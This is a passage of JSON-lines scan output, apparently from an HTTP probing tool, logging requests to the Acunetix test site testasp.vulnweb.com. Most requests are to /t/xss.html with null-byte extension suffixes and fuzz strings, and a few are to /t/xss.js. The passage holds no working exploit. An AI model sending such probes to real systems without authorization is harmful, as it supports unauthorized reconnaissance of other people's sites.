Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.944789987Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1460,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1460,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1460,0,active\",\"time\":\"348.396546ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:19.056766452Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1463,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1463,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1463,0,active\",\"time\":\"343.876447ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:19.21301986Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1464,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1464,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1464,0,active\",\"time\":\"347.120163ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:19.27435817Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg:1f1767b5696e79116b11ecc7f2882783\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg:1f1767b5696e79116b11ecc7f2882783\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg:1f1767b5696e79116b11ecc7f2882783\",\"time\":\"348.326926ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:19.291795483Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg:c4ca4238a0b923820dcc509a6f75849b\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg:c4ca4238a0b923820dcc509a6f75849b\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg:c4ca4238a0b923820dcc509a6f75849b\",\"time\":\"355.391408ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:19.298559264Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg=\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg\",\"time\":\"354.816068ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:19.302625075Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg?id_menu=485\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg?id_menu=485\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg?id_menu=485\",\"time\":\"351.907193ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:19.311254738Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.kr/bl_introduce?viewID%3D4533\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.kr/bl_introduce?viewID%3D4533\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.kr/bl_introduce?viewID%3D4533\",\"time\":\"345.967087ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:19.37453689Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.ru/presscenter/mediagallery/82046/1936508/\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.ru/presscenter/mediagallery/82046/1936508/\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.ru/presscenter/mediagallery/82046/1936508/\",\"time\":\"348.118474ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:19.447465197Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.ru/presscenter/mediagallery/82046/1936508/?\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.ru/presscenter/mediagallery/82046/1936508/?\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.ru/presscenter/mediagallery/82046/1936508/?\",\"time\":\"358.098434ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:19.493492589Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.ru/presscenter/videonovosti/87530/2198847/\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.ru/presscenter/videonovosti/87530/2198847/\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.ru/presscenter/videonovosti/87530/2198847/\",\"time\":\"339.529598ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.76700228Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.ru/presscenter/videonovosti/87530/2198847/?\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.ru/presscenter/videonovosti/87530/2198847/?\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.ru/presscenter/videonovosti/87530/2198847/?\",\"time\":\"342.727174ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.802600119Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.tst\",\"time\":\"346.837748ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.832747174Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst%5E%5EacUn3t1x%5E1\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst%5E%5EacUn3t1x%5E1\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.tst%5E%5EacUn3t1x%5E1\",\"time\":\"355.986623ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.832763753Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst%5Eajjswkcb%5E803\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst%5Eajjswkcb%5E803\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.tst%5Eajjswkcb%5E803\",\"time\":\"356.020235ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.836455707Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst%5Edxbguqxc%5E1876\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst%5Edxbguqxc%5E1876\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.tst%5Edxbguqxc%5E1876\",\"time\":\"354.06123ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.841728185Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst%5Eosejncro%5E1574\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst%5Eosejncro%5E1574\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.tst%5Eosejncro%5E1574\",\"time\":\"351.688414ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.84230888Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst%5Ersrvlbxf%5E1232\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst%5Ersrvlbxf%5E1232\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.tst%5Ersrvlbxf%5E1232\",\"time\":\"348.804124ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.869692747Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst%5Esupfwcny%5E4106\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst%5Esupfwcny%5E4106\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.tst%5Esupfwcny%5E4106\",\"time\":\"347.975665ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.869853748Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst///////qqvjbwxk///////$1$E9RlXBlO$A0OkW9V8qSo7Me4MJiskI.\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst///////qqvjbwxk///////$1$E9RlXBlO$A0OkW9V8qSo7Me4MJiskI.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.tst///////qqvjbwxk///////$1$E9RlXBlO$A0OkW9V8qSo7Me4MJiskI.\",\"time\":\"347.933908ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.882622471Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%EF%BF%BD%EF%BF%BD.fr/campaign/fr-adidas-x16\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%EF%BF%BD%EF%BF%BD.fr/campaign/fr-adidas-x16\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%EF%BF%BD%EF%BF%BD.fr/campaign/fr-adidas-x16\",\"time\":\"344.223426ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.882965728Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%250\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%250\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%250\",\"time\":\"348.609086ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.885992416Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst///////xawkgufx///////$1$REaKnY2e$UHa2A6ag9YlvYlF4iDdpH.\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.tst///////xawkgufx///////$1$REaKnY2e$UHa2A6ag9YlvYlF4iDdpH.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.tst///////xawkgufx///////$1$REaKnY2e$UHa2A6ag9YlvYlF4iDdpH.\",\"time\":\"354.593898ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.898239322Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?.jpg\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?.jpg\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?.jpg\",\"time\":\"353.325001ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.904875385Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?0.jpg\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?0.jpg\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?0.jpg\",\"time\":\"342.380761ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:28.904881876Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?.travel/top-picks/top-10-ski-and-winter-activities/3\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?.travel/top-picks/top-10-ski-and-winter-activities/3\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?.travel/top-picks/top-10-ski-and-winter-activities/3\",\"time\":\"347.841557ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.150782915Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?00\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?00\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?00\",\"time\":\"352.248868ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.182917768Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js\",\"input\":\"http://testasp.vulnweb.com/t/xss.js\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js\",\"time\":\"345.7242ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.273488259Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?901059\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?901059\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?901059\",\"time\":\"350.781761ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.288546964Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?903563\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?903563\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?903563\",\"time\":\"341.593238ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.300418199Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?903413\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?903413\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?903413\",\"time\":\"355.304272ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.413825706Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9043\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9043\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9043\",\"time\":\"353.639441ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.56780336Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9065\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9065\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9065\",\"time\":\"351.109633ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.624826686Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?910380\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?910380\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?910380\",\"time\":\"345.862258ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.645803579Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9176\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9176\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9176\",\"time\":\"343.03803ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.652742589Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9175\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9175\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9175\",\"time\":\"356.295588ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.653556075Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?920199\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?920199\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?920199\",\"time\":\"348.360875ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.672568696Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?920538\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?920538\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?920538\",\"time\":\"358.111653ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 